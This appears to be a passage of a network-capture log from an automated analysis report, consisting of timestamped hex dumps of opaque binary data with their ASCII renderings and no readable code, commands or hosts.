                                                                                                                                                                                2021-11-11 11:27:09 UTC11773INData Raw: 56 6f e5 1b 5b 0c f2 19 ea 9f 05 3d 6c 5f 83 02 87 61 40 c7 b9 c6 65 00 d3 92 aa 03 a1 8e 9c 08 7b 91 0e 1b 35 95 51 c0 cd 9d e7 86 8f 00 aa 80 7a 58 9b ea 99 c1 f0 50 0f 37 c8 41 56 c0 e5 d8 42 40 83 07 3a 14 f3 3d 4d b0 94 b2 2d 32 00 57 7a e8 63 0a 02 c4 c3 f8 27 98 d3 07 71 d9 56 21 37 c0 d7 6a 86 f6 7a 9e 00 20 7a 76 fd 88 1e 9d 72 07 3b ab ff 21 ec b0 6e fc aa 9e 17 18 e3 bd 00 86 4a 93 d7 b4 17 2e dd e9 8c 00 c6 15 d9 c1 1c cf 07 8d 35 27 c7 96 70 e0 61 59 df 17 25 cd 43 eb 75 80 8a 28 00 4c ae 83 a1 02 96 43 0f 58 bd fb cb 20 50 45 80 bb 4d 78 b8 00 0c f8 cc dd 61 b9 f0 66 00 ba d3 fc 42 c4 8d 7c a1 00 cf a0 7e cb 85 2f 72 bf 00 af fe 94 df 21 ac 0a b2 00 2a 93 36 7a 2b 0d f7 18 07 de a6 a4 2e 91 70 1c 7f 30 09 00 93 8d 7b d4 42 45 bb e2 90 c0 1d
                                                                                                                                                                                Data Ascii: Vo[=l_a@e{5QzXP7AVB@:=M-2Wzc'qV!7jz zvr;!nJ.5'paY%Cu(LCX PEMxafB|~/r!*6z+.p0{BE
                                                                                                                                                                                2021-11-11 11:27:09 UTC11789INData Raw: fd 74 7c c4 16 4e 0a 7a 00 8d 83 ef 76 cf 1a 00 64 28 9c 93 fc af 4c 0d 00 43 aa e1 6c fe 36 bc 17 00 22 b7 13 23 5e d7 21 d2 38 ca 7d dc 42 00 58 86 c5 fe 52 0e 09 00 b1 f0 5e ce 1c 87 9e a6 0e 3f ac fb dd 6e a1 80 bb d5 e4 50 69 00 c9 64 87 d3 28 ee a8 75 0a 54 fa 08 3e b8 50 ba cd 02 f3 70 23 de f0 62 60 39 96 15 3b 8d 06 7d 76 ae 00 c4 c7 7b 20 40 1d fa f9 e8 75 00 ac ff 56 31 69 5a db 1c 60 49 ba f7 27 36 5d 2e 66 c1 8b 00 e6 9a ba fb 0f 91 01 f2 3b af 15 0a 7b 9d e0 44 e7 38 e0 34 80 81 7d bf 31 d6 08 e5 09 3e 41 1e 0f 80 bf f3 55 93 f7 00 42 4b 92 c7 71 4a b9 ee 00 65 63 ca da aa 68 07 f7 3e a9 78 83 30 42 dc 94 b0 f0 9f 12 31 70 64 00 9a af a9 ac 7f 7b 8f 1c 00 04 89 c2 9b 76 84 bc ff 00 b5 12 68 9f 3a 55 02 e4 00 5e 66 96 df e8 8e b8 90 00 5b 54
                                                                                                                                                                                Data Ascii: t|Nzvd(LCl6"#^!8}BXR^?nPid(uT>Pp#b`9;}v{ @uV1iZ`I'6].f;{D84}1>AUBKqJech>x0B1pd{vh:U^f[T
                                                                                                                                                                                2021-11-11 11:27:09 UTC11805INData Raw: 82 27 c7 63 70 be b9 00 ce 93 e9 95 a8 16 b5 55 03 4e da 45 6f c1 c0 c9 c6 37 e0 7d 1d e4 ea 03 7c f2 e9 f7 ef 90 af a0 a2 8b 09 d8 75 07 00 92 f3 16 2e 10 b9 df d4 00 9e 9b 90 81 a9 c0 96 45 00 a8 73 fc c4 8b de 57 4f 00 af d1 f3 4d 52 46 f8 03 00 a8 dc 28 4a 56 a9 2d 07 3b 61 d9 00 f1 cb 99 08 a4 cc 14 00 e4 e2 13 2e 82 f2 24 d9 00 43 f1 e3 a0 1d 8c 33 2b 00 cd 09 c6 d4 6e 88 ee a8 00 38 2a 84 5b 49 96 bc c0 03 7b 74 90 9e 47 f3 98 23 46 5e 01 8f 92 a1 f8 76 41 2c c0 69 ed 00 13 55 d0 26 35 94 0e e8 01 0a aa 60 d8 71 bc 2b e4 10 33 00 8a d7 ef c6 90 c1 d5 ce 3e 77 69 00 b4 db 74 a3 b6 02 7d 00 da c5 ca fa ab 4a 2c 07 09 b5 58 e6 ac 80 eb 57 ed 80 7b 91 f8 40 76 ea 8b 6e 08 14 75 95 86 54 00 6b e2 b8 81 fe 57 7d 12 7d 55 00 49 ed 53 82 8c 2a 14 a8 00 58
                                                                                                                                                                                Data Ascii: 'cpUNEo7}|u.EsWOMRF(JV-;a.$C3+n8*[I{tG#F^vA,iU&5`q+3>wit}J,XW{@vnuTkW}}UIS*X
                                                                                                                                                                                2021-11-11 11:27:09 UTC11821INData Raw: 15 87 f7 38 00 24 7d 29 6b fa f4 34 00 de d5 66 b5 1d 19 53 e6 fc 7b 00 f0 dd 99 0b a4 60 17 96 12 09 ff ed ed 28 c0 9c 49 50 5a 35 01 fc 2a 6f 63 28 37 db e8 a8 b8 00 ef 06 a6 32 24 c1 7e 4e 0f 58 91 e0 de e7 99 8e 41 12 88 b8 30 c6 fa fa aa 0f 76 7c 6f 2c 40 35 77 f8 c7 bb 00 38 c3 59 0b e7 ed 03 98 00 0a d2 7f cf 2a 0d c9 ff 00 ac 85 aa 8e 64 08 cd 5f 00 18 0f a7 49 34 c8 1b d9 00 57 60 2c 24 c3 cb 82 f2 1d 39 81 8f 43 18 6b 1c 56 e3 e7 98 11 55 93 00 62 6c f9 1b 29 45 d7 89 00 f2 20 ce 51 c9 ac 9b 4c 01 01 c6 dc 6e c4 4e a8 e0 6d 1c 00 73 42 aa af 47 57 d7 e4 00 58 98 1a 2f fd dc 55 ec 01 7c ee 24 fe 37 d6 b5 29 18 c0 bf 3e 10 aa 32 00 cf e4 19 3d ea bc b5 2f 0e 07 91 7e a6 ee de 80 f8 36 a8 d8 58 0b 94 e8 2a ce 00 52 1c 32 10 73 38 ae b9 80 61 fc 3d
                                                                                                                                                                                Data Ascii: 8$})k4fS{`(IPZ5*oc(72$~NXA0v|o,@5w8Y*d_I4W`,$9CkVUbl)E QLnNmsBGWX/U|$7)>2=/~6X*R2s8a=
                                                                                                                                                                                2021-11-11 11:27:09 UTC11837INData Raw: 9a 93 bd 53 de e7 52 68 0f 3a d2 e5 88 80 1f e4 7b 13 17 77 0f 00 ed c6 91 2c 3a 18 8a cf 03 4e b0 bc 35 14 a8 f8 92 2e d9 3c bd aa 80 5b 60 b8 e1 72 d4 28 00 df d3 cf 74 2c 3f 5c f5 00 d5 06 5a ae 5d b0 7c 94 0e fd 2b f3 df 00 8a fb 44 e2 11 17 cf b7 74 fd 98 c0 c7 8b 1b c6 51 2c 7f b2 fe 00 a1 ff 94 0f 72 e0 00 08 47 39 d7 79 90 b9 ab 7f 55 00 63 ec 99 a0 c4 b0 d8 53 00 ad 20 c7 4c 26 2b 82 77 48 ca 87 3e 39 80 a1 d0 df b7 ab 84 af 05 6b 79 7a 02 40 80 b5 08 9a 29 00 07 d4 09 6e 92 d5 15 2d 1c fb 7d 8e 9f e6 fc 80 4b 35 c0 17 73 ed ea 00 ff f6 63 c8 69 60 e9 6e 98 e3 00 5d 18 c7 51 75 08 c9 a7 00 0a bf ef 56 f9 05 d9 89 4f ae 9c 38 90 03 8e 77 7e ad a2 5f c0 56 b4 a3 17 4a 91 0a 03 93 22 63 c9 e0 d3 03 23 1f 67 18 b7 40 3b 28 cf 20 60 3f 00 d0 0c 72 b9
                                                                                                                                                                                Data Ascii: SRh:{w,:N5.<[`r(t,?\Z]|+DtQ,rG9yUcS L&+wH>9kyz@)n-}K5sci`n]QuVO8w~_VJ"c#g@;( `?r
                                                                                                                                                                                2021-11-11 11:27:09 UTC11853INData Raw: 28 e3 12 19 aa 00 7c 51 62 73 bb 88 3a a1 07 64 74 c5 66 2b 50 a5 23 33 c3 00 18 1c 49 0a 2e 9b 7b 7e 00 29 95 d9 3c f4 8b c9 90 00 97 f9 e3 35 4b c7 db 0a 00 2b 75 a9 86 eb d9 bc 24 e2 58 00 02 1a a3 54 ff 8c 15 c0 00 87 f1 e9 47 97 b5 5a 32 00 0d fe 63 58 8a 64 42 2c 00 73 4b 31 f4 ab 0e 78 0a 00 f6 52 5d 7e 13 84 1c 74 00 9b f2 df 46 37 2d 06 cb 03 29 7c a6 88 6c 42 e0 c4 35 28 f0 ae 0f fa fb 1a 85 c0 6b 55 ac c8 a7 00 7d 2e 21 5b a9 88 67 90 00 b3 a1 27 e7 a5 8c 8f ed 01 c4 ae ac 12 0d e5 04 32 58 80 6d eb 1d 18 8e 3e 01 80 d6 10 07 96 97 91 0d 2f a4 75 2c 28 88 01 5f 19 f0 32 94 e0 98 e8 4b e4 26 3f 0f 2e 00 22 1b bb f1 fc 8b 39 fd 43 bb 55 81 45 10 52 87 73 a1 30 93 b4 00 6a 4c bc 86 65 64 c7 9c 00 e0 04 3a 5b c5 58 6f db 00 c2 24 d5 fe 4f b9 e8 a6
                                                                                                                                                                                Data Ascii: (|Qbs:dtf+P#3I.{~)<5K+u$XTGZ2cXdB,sK1xR]~tF7-)|lB5(kU}.![g'2Xm>/u,(_2K&?."9CUERs0jLed:[Xo$O
                                                                                                                                                                                2021-11-11 11:27:09 UTC11869INData Raw: 8a 70 48 38 a4 79 38 4a 38 00 a7 b8 3b f3 60 ad 51 3f 7e 92 81 ab 53 90 8e f4 f7 32 80 81 a3 a7 aa dd e0 68 2e 58 c2 50 a0 e0 eb af 05 10 21 ea c5 df 28 b8 5c 01 b3 14 2b 93 ba 0b e9 32 78 80 16 30 d5 bd a7 12 c6 b4 c4 28 c8 5c 01 1f 13 c7 80 de cc 44 22 88 90 e8 a0 ae c7 0f 05 66 9e b3 22 6c 28 88 a8 01 c9 e6 56 fe 0b d1 0a 4a e8 42 98 80 2a 03 9c 20 90 00 a6 c7 cc a8 cb 98 f6 2f 7b e3 58 b7 38 a7 70 54 e6 db 88 14 17 31 4a a8 a0 3a ab f6 05 73 81 e2 fd 5b 28 88 d7 02 77 54 3c 4c aa 09 7c 98 53 b8 4d b1 1c 0a 9c 50 99 f7 b8 5a 3a 98 94 b0 00 a5 0a 51 ff f3 7f a8 be ac 30 00 67 0a ab 79 0e bb f0 09 00 37 40 3a 53 4f 9d 1c 3e 0f a7 5d d8 b1 02 20 6e 94 65 40 00 b8 fa 0d 91 e8 1e 24 40 f9 d0 52 14 80 85 c0 00 2c b3 66 29 45 ba 2b 32 7d 30 09 19 58 01 f2 4c
                                                                                                                                                                                Data Ascii: pH8y8J8;`Q?~S2h.XP!(\+2x0(\D"f"l(VJB* /{X8pT1J:s[(wT<L|SMPZ:Q0gy7@:SO>] ne@$@R,f)E+2}0XL
                                                                                                                                                                                2021-11-11 11:27:09 UTC11885INData Raw: 29 70 1e 38 d7 92 00 eb a1 4f 0d 0f 1f 78 01 10 a9 6b d0 7a cd 8c cc de 2c 00 95 71 0b 8d e4 97 9b a0 00 2f 05 09 6b 34 15 56 a6 27 4e 45 16 b8 00 6e 26 19 5f 23 f0 c1 90 07 59 2b 0f 6d c2 00 ee aa 25 cb e4 83 00 4b b5 7c e5 8a 66 2c b4 02 5a 22 a8 70 94 42 c0 ba f0 20 00 c4 9a 4a 97 2a 28 64 b0 00 bc 38 27 d0 8e 06 37 14 00 b3 a0 57 0f 19 ad 4e 40 00 f1 53 86 81 d5 63 17 05 00 c7 5f c3 5b c9 e8 68 19 f4 92 05 9b 1c a9 fe 7b 80 ea b3 c4 a8 0b 5c f7 5d 2c 00 96 06 08 82 76 05 4f 1c 43 60 9b c0 bb 26 7d 94 00 36 0a 9e e7 6e 30 50 0c 0f a4 7e 64 10 e0 58 e9 ff e3 5f 00 81 42 4f 36 3f 29 79 18 0a a8 16 a3 0d 87 00 94 95 4a b2 d1 be 7e fd 00 7d 0e a7 cd 05 03 9a e9 01 b1 d5 d8 9e 5f d4 be f4 b6 01 76 9c 09 e1 79 5a ac 80 aa 46 a0 24 47 00 ad d8 06 27 bd 63 8a
                                                                                                                                                                                Data Ascii: )p8Oxkz,q/k4V'NEn&_#Y+m%K|f,Z"pB J*(d8'7WN@Sc_[h{\],vOC`&}6n0P~dX_BO6?)yJ~}_vyZF$G'c
                                                                                                                                                                                2021-11-11 11:27:09 UTC11901INData Raw: 76 1f 1c 44 4b 80 79 91 d5 13 e4 40 00 7f 42 2a db f0 2c 27 45 00 d7 ae 11 7d 8a 2e 6f 79 00 c3 ce a7 54 cf 32 62 2f 00 9c c5 81 9b 55 d1 7d b4 00 ed 1e 34 53 16 4d 82 72 00 c2 1a 6e 5d e7 8e cd 86 00 8c d1 4a 51 98 b5 a0 74 00 53 45 17 77 bc e7 6c 02 01 e2 27 bf cf 0e d6 70 e8 ab 26 3c ca 15 75 00 fa d8 2c 61 28 65 92 ce 00 17 4c 45 dd af 37 14 ec 00 e8 81 08 bb 0e 32 39 c7 f2 95 00 a4 c2 26 65 72 3a 99 5a 00 1a 29 aa 41 ab 57 6e bb 00 4c 6b 84 c1 44 78 4e 5a 00 37 cf f2 a7 e4 ab 3a 17 09 5e 4c 5b 83 73 f8 77 f7 e0 c8 b9 35 40 00 04 12 4d 20 df d8 de 34 07 ec 44 64 ff 78 80 85 e3 bc ed 03 e8 04 28 a9 96 de 98 75 f1 a4 00 ab a0 fa dc 0d be 8e 2a 00 45 99 78 13 5e 95 5b c3 e8 39 00 89 79 9b 98 b5 26 cf b6 00 41 83 a1 cd 5b 57 23 d9 01 9f 09 31 39 9e 40 59
                                                                                                                                                                                Data Ascii: vDKy@B*,'E}.oyT2b/U}4SMrn]JQtSEwl'p&<u,a(eLE729&er:Z)AWnLkDxNZ7:^L[sw5@M 4Ddx(u*Ex^[9y&A[W#19@Y
                                                                                                                                                                                2021-11-11 11:27:09 UTC11917INData Raw: ee cf 7f de 0b 72 5c c2 0a 78 4f 5e a8 41 03 44 09 71 3d 00 a7 4d cc be bd 08 52 81 25 56 4e 40 30 37 3f 5e 86 09 ba 01 38 bf 64 ff 09 27 73 55 32 d7 08 14 9e 03 69 4b fb 5e ff 90 bc 03 6d 3f c7 2a 98 78 d6 5f 0c 09 59 13 dc 6f 5f 28 65 08 25 b8 1d e9 d7 58 e3 3c 1d a7 7e d7 3c 32 c0 2c 5c e3 cf ec eb 1f 68 09 4e 1e f4 6f a4 40 c1 f3 2e 24 56 26 40 eb 95 9f 7e c9 e0 c6 09 24 49 4a 5e d9 2d 44 10 ab 8b 11 49 18 80 68 10 c4 3f 7d 9d 51 d4 3d 04 c7 df 7e 5e a5 16 e4 e5 72 2e da 3a b9 c0 b4 f2 df 67 9d 80 8b 9c 3f fd 7b 90 ff 24 eb 04 ea 18 c3 1d ac 45 37 ee 7e 0e e0 26 aa e0 04 b6 f5 c0 58 05 59 bf 0a 4b 7a e9 a5 46 02 65 17 6b 67 64 46 94 c7 83 10 63 c9 6d 22 46 74 4a 5e ca 0b 28 c2 15 33 51 53 b6 32 9a 7c 72 aa 09 21 6a 7f 06 5f ba 91 05 0c 5b a2 64 04 1c
                                                                                                                                                                                Data Ascii: r\xO^ADq=MR%VN@07?^8d'sU2iK^m?*x_Yo_(e%X<~<2,\hNo@.$V&@~$IJ^-DIh?}Q=~^r.:g?{$E7~&XYKzFekgdFcm"FtJ^(3QS2|r!j_[d
                                                                                                                                                                                2021-11-11 11:27:09 UTC11933INData Raw: a5 bf 40 c3 9a 1a 0a f5 69 61 b7 d0 09 91 38 73 65 80 d4 4b 8b 69 d3 02 5a 74 00 cf 04 81 f8 fe 91 60 22 10 bc 1a 16 e6 71 6a 4e ad 20 25 f3 02 9a 41 05 88 94 71 06 1f a3 0c 3e 04 18 d5 14 09 a2 f3 82 0b 2c 56 46 e0 2f ce 0f 66 92 82 c7 1c 2d 24 dd bb 0d 05 18 ad 3d bc 78 00 82 0d 2a e9 47 a1 50 37 a8 fa 4b 12 ff 66 d1 f8 0c 5d 96 d7 52 5e bd 0e 34 55 6d 54 f2 55 d6 52 d7 b2 25 09 0d 0e 3f 23 be e0 57 c1 72 33 94 f0 93 1a d9 14 25 34 92 d8 14 70 40 49 ee 18 27 b2 24 13 04 90 70 31 f7 fa 24 85 e4 3b 59 67 d8 d7 f6 d4 fb 01 bd ea 15 3c 6f 20 2a ee 4c 34 4e 80 a1 87 cb 3b b3 41 0f 9c 38 f9 60 5f bc c8 4b 47 1f 5a bd 9f 18 f2 38 22 69 50 03 d2 6e 03 1f 45 0a 0e ca 77 00 14 a4 b6 11 29 fa 0d e0 70 df b9 a6 58 fb be 80 61 16 b9 cc d3 f4 3c 72 9d 86 d3 87 2a d2
                                                                                                                                                                                Data Ascii: @ia8seKiZt`"qjN %Aq>,VF/f-$=x*GP7Kf]R^4UmTUR%?#Wr3%4p@I'$p1$;Yg<o *L4N;A8`_KGZ8"iPnEw)pXa<r*
                                                                                                                                                                                2021-11-11 11:27:09 UTC11949INData Raw: e9 d7 de 19 c2 0d 1c 50 1a 48 bc 68 d0 ff 26 c5 14 70 c8 b5 32 a2 12 7e ff 80 4c e4 01 1d 49 80 d7 32 09 40 2b f9 33 f1 e2 e8 fc 04 d7 8c db ec ec 1d bb 47 85 4a 7f 36 04 f0 c6 9c be 74 7c ec 76 c1 52 b2 fe fc 06 50 28 97 bb 8e 0f 64 02 0e 05 97 b2 ab d3 ba 83 32 44 eb bc ea 90 82 0d 3e 5a 81 8c 80 e1 07 93 10 70 eb 07 dc 44 f8 82 2a c5 83 ae 4d 3d 05 5c b0 ec 34 1c 05 e6 7a db be 4b 98 6a f1 32 02 6d 9f 09 16 03 15 81 dc 43 39 48 79 06 dd f8 aa c0 2d 24 30 1c a4 74 86 0d 41 48 e0 0c 81 54 e1 61 19 8e 24 92 0a 19 49 75 da 76 ec 93 2d f0 b6 43 06 bb 41 dc 65 7e 18 28 a9 33 b0 4b 2c 81 69 19 ef c1 9c 8e 14 fd 06 e0 b6 f2 55 1f bf fa c6 0c 76 37 5a 13 ec 62 3c 4d 98 65 78 0f fc 92 02 cc 44 0d 46 82 f4 3e 03 af 11 c2 4d 18 24 7e b4 fc 7b 94 c3 a6 41 7d 93 01
                                                                                                                                                                                Data Ascii: PHh&p2~LI2@+3GJ6t|vRP(d2D>ZpD*M=\4zKj2mC9Hy-$0tAHTa$Iuv-CAe~(3K,iUv7Zb<MexDF>M$~{A}
                                                                                                                                                                                2021-11-11 11:27:09 UTC11965INData Raw: bb 9b 76 96 eb 3a 07 5b fb 2d 5a 22 26 5e b8 1e 4f ea 6d 7c 2e f2 ad 81 47 49 fd 79 d4 c7 66 2d 71 6d de 96 7f ad d4 f9 70 35 0f 2e af 6f e1 c4 ff 93 15 a8 b9 fb 7f 0c 81 1e f2 5e 57 d2 6f 60 1c e9 85 12 0b f6 ff d6 88 65 ed ad 66 d2 11 3f 12 38 0e 7b 4a ff 33 04 1e b8 0c c2 6e 3b 58 2d 73 8b 7f e7 70 06 4a 3a 89 91 a5 24 61 4b 81 f2 5f 40 5e c5 23 1e c4 6e 52 dc 28 05 45 d7 cf bf e7 2d 06 bb c4 dc 03 50 04 b7 36 45 4b 77 f8 83 16 61 73 9d 2b 6b 2a 6d 73 80 0a 8d bf 5c f1 54 96 85 d8 e3 ba c9 30 8d 50 b7 9d 5d b4 c7 0c 94 88 06 10 ac bf bf 87 56 50 7f 33 b4 de f7 60 1e 16 6b 68 4d dc 00 d7 b0 a1 99 d9 ae c1 02 e0 19 4c e5 af 4b ab 04 d9 42 58 bb a2 59 01 1a f0 2b ea 7e 99 f7 18 d9 0f 5c 9c fa ba 09 57 f4 dd 8a 7a 3f 17 af 90 f2 ee 9c 1d 5a 22 23 58 08 e9
                                                                                                                                                                                Data Ascii: v:[-Z"&^Om|.GIyf-qmp5.o^Wo`ef?8{J3n;X-spJ:$aK_@^#nR(E-P6EKwas+k*ms\T0P]VP3`khMLKBXY+~\Wz?Z"#X
                                                                                                                                                                                2021-11-11 11:27:09 UTC11981INData Raw: 89 50 f7 55 7f 00 ca 56 a4 de fe 6d 9c 15 15 e1 67 f0 64 88 59 8e 94 f7 31 60 6c 9d a9 40 9f 00 e5 25 08 6d 9e c3 2c 7a 4d 99 ca 84 96 ba bf b4 87 75 90 2b 12 5a d4 ff 20 ba b5 aa 35 58 80 29 3e a5 cc 0c 86 e9 b1 87 1f 68 cb 84 12 77 c8 1d 2c e6 ce 13 b5 f9 7e dc 9e 05 a0 0d 41 53 bd c7 7e cf f0 04 2d a6 df 3b eb f8 07 e2 ea 82 11 e9 5e 7b f4 12 68 e0 e6 75 be 73 c9 50 fc 09 79 e2 1f 7f e7 35 14 35 10 07 68 0e d6 fa 5a 23 01 57 bf 82 df 97 2e 20 73 79 8c f2 12 0e 29 7c e3 72 40 0c 5f 4a 58 11 52 1e 27 44 77 61 a1 e9 c2 76 c5 6f 1e a9 b9 00 9f 3f 7e 2f 41 54 73 53 5a 5c fe 64 26 40 95 7e 43 fc 5f 5b a2 ac 09 07 c8 82 f9 36 2d d3 4e 38 1c 52 ba 00 87 0b ff 55 f7 d2 81 c2 13 94 5a ef be c0 4f be ed e7 28 e2 52 b7 0c a3 c7 5e 3f bc f2 d0 2e 09 3e 41 5c 0d 09
                                                                                                                                                                                Data Ascii: PUVmgdY1`l@%m,zMu+Z 5X)>hw,~AS~-;^{husPy55hZ#W. sy)|r@_JXR'Dwavo?~/ATsSZ\d&@~C_[6-N8RUZO(R^?.>A\
                                                                                                                                                                                2021-11-11 11:27:09 UTC11997INData Raw: fb 5a 00 7e 29 e6 02 65 cb 4c cf b8 12 aa c3 af 99 ce 6a f3 9c 04 7f b5 26 02 19 80 62 7b 0f 16 07 44 c2 03 0f 0d e1 b7 55 f4 ef 3a fc 5d e2 28 ee 70 12 c9 83 d1 ff e7 da 4f d5 74 eb 6c 14 02 17 a1 ec ff 65 8e 16 f8 d3 b5 96 d1 65 70 68 62 e0 55 bd d7 48 cb 46 00 81 ed 07 57 43 c1 41 1a 01 ea 5d 4a a0 b4 95 8e bb 1b 51 5a fe 04 07 f0 7f 05 50 d8 d0 92 7b 74 07 81 f7 3c 42 93 31 a9 68 f9 70 ac 36 99 b4 2d 5f be 58 91 b1 06 e9 9d b2 1c 00 53 57 bf ea 9e 5f 7e 31 9d 72 40 05 5a 68 b8 bb e7 ae 88 33 b9 a9 14 ca 20 4e cd 25 8d f6 c2 47 74 bf 0b 5c 87 03 61 95 4d e7 d9 dd 9c 28 98 84 24 66 86 0e 04 98 99 fe af f9 e5 dd 99 bd 42 7b f2 5c 4d 6c 1c 4a 65 78 be b3 50 e6 10 61 1c fa a4 d1 23 2e 04 a5 9c 4c df 18 78 78 54 0e ef ff ad 01 b2 ff 90 81 18 87 fe 97 7b 98
                                                                                                                                                                                Data Ascii: Z~)eLj&b{DU:](pOtleephbUHFWCA]JQZP{t<B1hp6-_XSW_~1r@Zh3 N%Gt\aM($fB{\MlJexPa#.LxxT{
                                                                                                                                                                                2021-11-11 11:27:09 UTC12013INData Raw: d6 dc e8 01 c2 3a 70 03 05 06 04 30 15 2d 44 46 e8 f3 95 80 52 96 16 4b c6 f7 3f 61 da a6 d5 e9 ca 05 b3 38 79 12 16 61 2d aa 70 fd 3f 08 85 14 51 5b f6 a4 a8 e2 40 3c 77 2b b0 fe ca f8 29 94 80 06 09 47 eb c0 5d 7c fc 45 22 03 77 2e 9f e0 12 f5 59 3e 4c 18 0e 49 08 2c 29 71 d4 01 4a 6f 3c 40 23 78 24 c8 4e c1 b5 da 1f 24 a2 05 e9 0a 70 73 80 04 bb 37 32 ff 28 18 9b 10 25 3a 01 04 fd f8 3f 78 09 d4 d7 00 a0 86 0d b5 7f d2 a0 05 36 1c 10 f3 e9 0f 80 e6 01 25 1d ab 0f 96 93 f5 e6 20 2a 03 b8 be 70 3b af a8 39 f4 71 e0 18 82 03 c6 65 c9 6c ab e0 08 1d 60 38 5c 32 cc 2b 30 33 14 16 07 2b 56 5d 5c 10 49 f8 81 32 d9 f0 6f 01 36 52 39 40 0a 9c 50 38 b6 82 b7 3c a9 5c f8 a1 05 12 33 28 fe bd fe 8f 6d 5e b0 53 27 30 bb 64 0c 61 e2 b6 14 36 07 2c ac 16 78 fd ff d8
                                                                                                                                                                                Data Ascii: :p0-DFRK?a8ya-p?Q[@<w+)G]|E"w.Y>LI,)qJo<@#x$N$ps72(%:?x6% *p;9qel`8\2+03+V]\I2o6R9@P8<\3(m^S'0da6,x
                                                                                                                                                                                2021-11-11 11:27:09 UTC12029INData Raw: 2f 51 a8 aa cf 41 69 fd 5f 94 3e 00 53 bb 82 45 fb 7d ff c3 13 c1 eb 05 00 7a 6d 1b 12 5d 01 2f da 5b f1 67 1d 7d 49 ef 77 5c 2e 72 7d 71 0b 78 52 ba a0 26 29 d0 53 5a 88 0f 68 78 17 aa 7b 63 b0 06 be 62 fe 4b 7e aa 9a e5 03 bc b0 fe ee 75 c1 f7 d4 3f bc 83 81 ff a3 77 5d 00 cc 87 1b a3 b9 f7 c6 c4 14 25 ec fa d8 e8 95 56 5b 44 52 cd 8f da ff f1 f2 7a 20 bc bd c9 21 fd 4a 3f bc a9 f4 22 62 35 87 17 e9 bd 79 60 33 ca 77 f5 01 dc 1f 59 4b 16 0b f4 fc 7d ee 2f 91 fb f8 5e 38 07 79 01 72 93 e7 42 c3 f0 6b c0 a2 ed 14 ef ce 24 3f 77 03 17 91 ae c2 80 59 f3 7e 05 f6 86 c6 1f e2 c0 19 90 5c 01 0b 06 c1 d2 ce 5a 7b e0 8e 12 75 46 10 91 87 bc 3f 70 6f c9 05 74 2e 60 65 3e e5 c1 60 15 89 14 cd a3 1b 18 12 03 69 e6 b1 c2 13 63 f3 36 25 c2 b0 d4 4e 56 21 65 08 40 ab
                                                                                                                                                                                Data Ascii: /QAi_>SE}zm]/[g}Iw\.r}qxR&)SZhx{cbK~u?w]%V[DRz !J?"b5y`3wYK}/^8yrBk$?wY~\Z{uF?pot.`e>`ic6%NV!e@
                                                                                                                                                                                2021-11-11 11:27:09 UTC12045INData Raw: 5a df a1 f1 5e 48 83 00 68 ae 47 27 f7 3b f4 7f 50 89 c3 97 71 a8 81 68 6b fe 6c 77 d4 2b 01 3d fb 7d 05 70 a8 ef 6e eb 3a 05 4b e9 c7 a9 7a 9a 04 c1 19 65 fe 7d f5 89 0b 02 68 57 e1 67 4b 76 3c a0 ab 14 29 eb 76 65 4a eb c8 80 28 b5 ce 04 b5 e5 ba ed 20 2f 20 4c 5f 8f 04 97 74 73 72 d4 39 f6 97 7b cb 45 56 32 e9 f6 dc 49 02 64 dd f2 6f 13 78 32 3d 5a 93 db b3 ea 79 09 e9 0f 2e f4 dc 08 43 67 8b af 08 83 0e d8 b1 a8 2d 12 0a 55 26 0b 99 12 09 f3 7b e5 a4 48 14 49 93 f2 82 90 a6 13 cd f5 38 fa 9c bf 97 ee 48 88 c9 b9 20 e9 35 17 b1 f4 f8 b0 4c bb 60 21 68 9c 68 3e c3 b8 c3 97 e2 c2 5f d1 6c 4f a9 58 f4 cd e5 56 b8 9e b4 be 32 a4 53 74 eb 9f b7 dc 43 23 1f e3 d2 5c af c9 96 1d bb 3a bc 9b bd 5c 51 68 0b ec 58 af 6e fe 6a 54 95 df 9e 31 9f 5f 15 71 cb dd 94
                                                                                                                                                                                Data Ascii: Z^HhG';Pqhklw+=}pn:Kze}hWgKv<)veJ( / L_tsr9{EV2Idox2=Zy.Cg-U&{HI8H 5L`!hh>_lOXV2StC#\:\QhXnjT1_q
                                                                                                                                                                                2021-11-11 11:27:09 UTC12061INData Raw: d2 bc 58 21 6e c3 3e f2 56 cc e9 55 64 74 11 ab ff 56 40 8c 71 7f f9 9d de a5 67 79 62 5c d9 06 28 11 20 6c ce c5 54 f7 05 e9 19 10 53 14 c1 6d 7d ab 82 83 52 2f e7 04 08 0b 0c 2a 42 18 11 e7 77 92 46 55 97 de 90 44 33 be 86 e0 6d 28 e2 0d e0 18 46 9c bb 14 d8 ff 03 16 22 ce 94 9b 75 3d 52 98 18 d7 1d 14 87 af 83 e8 26 4f 40 08 a5 8e 50 c4 0f 07 9c 80 70 9a 9b 1c 16 e1 c2 f7 98 2a a0 5f 9d 18 7a cc 59 8f 33 0c d4 62 25 34 34 90 f7 97 5c a5 48 ce ac 27 82 77 76 28 c3 7a a6 14 0c 90 4a e2 00 7e 7d bf 10 2c 2d e1 1e 68 ca 50 06 1b 87 4c 40 12 59 55 a6 04 c5 69 ed b0 4c c5 61 54 1c 6e 3f 0d c7 10 58 8d c0 4a fc b4 09 31 c6 3b e4 df 41 4d f7 b0 ec ff 7f 97 f6 b1 48 f3 ad 51 2d 60 5f 68 ec c5 64 d3 4c 56 32 f6 c8 58 22 d1 4f 44 fa 6d a8 6a 98 4b 7e 12 1e ed 3a
                                                                                                                                                                                Data Ascii: X!n>VUdtV@qgyb\( lTSm}R/*BwFUD3m(F"u=R&O@Pp*_zY3b%44\H'wv(zJ~},-hPL@YUiLaTn?XJ1;AMHQ-`_hdLV2X"ODmjK~:
                                                                                                                                                                                2021-11-11 11:27:09 UTC12077INData Raw: c2 79 02 40 16 8a 25 94 fc d7 b8 1c b7 b2 24 0a 43 f9 01 fd 64 a0 69 62 6b 1e 56 11 a4 94 48 05 6d 05 c6 cd f1 1e 6d fe 80 7b 87 98 72 5f ca 12 f7 08 0d 49 89 b0 bf 24 5f 79 28 2a af 64 16 61 08 41 5c 2a 91 a4 52 9f e2 1a 7f 6c 21 97 dd 3c cd 9d 12 3f d7 d9 57 49 df 6f 0b 25 7d e7 4b 3d de e7 26 b5 fa f2 14 a4 ae a8 c1 bd 6e dd 36 78 0f 81 c8 f5 ef 7f d4 ba f0 25 ff 6d 55 4d 0d af ef 47 92 33 be f2 91 25 ea 41 2a d1 7f f8 78 97 f8 bb 69 2a df 4f e7 4c b2 e7 27 bf 4d 79 ca 96 d2 fd 05 4e cb 08 25 6c 79 c8 90 5d 81 e9 66 61 f2 6c 23 06 2a 4b 14 6f 0c 0e f7 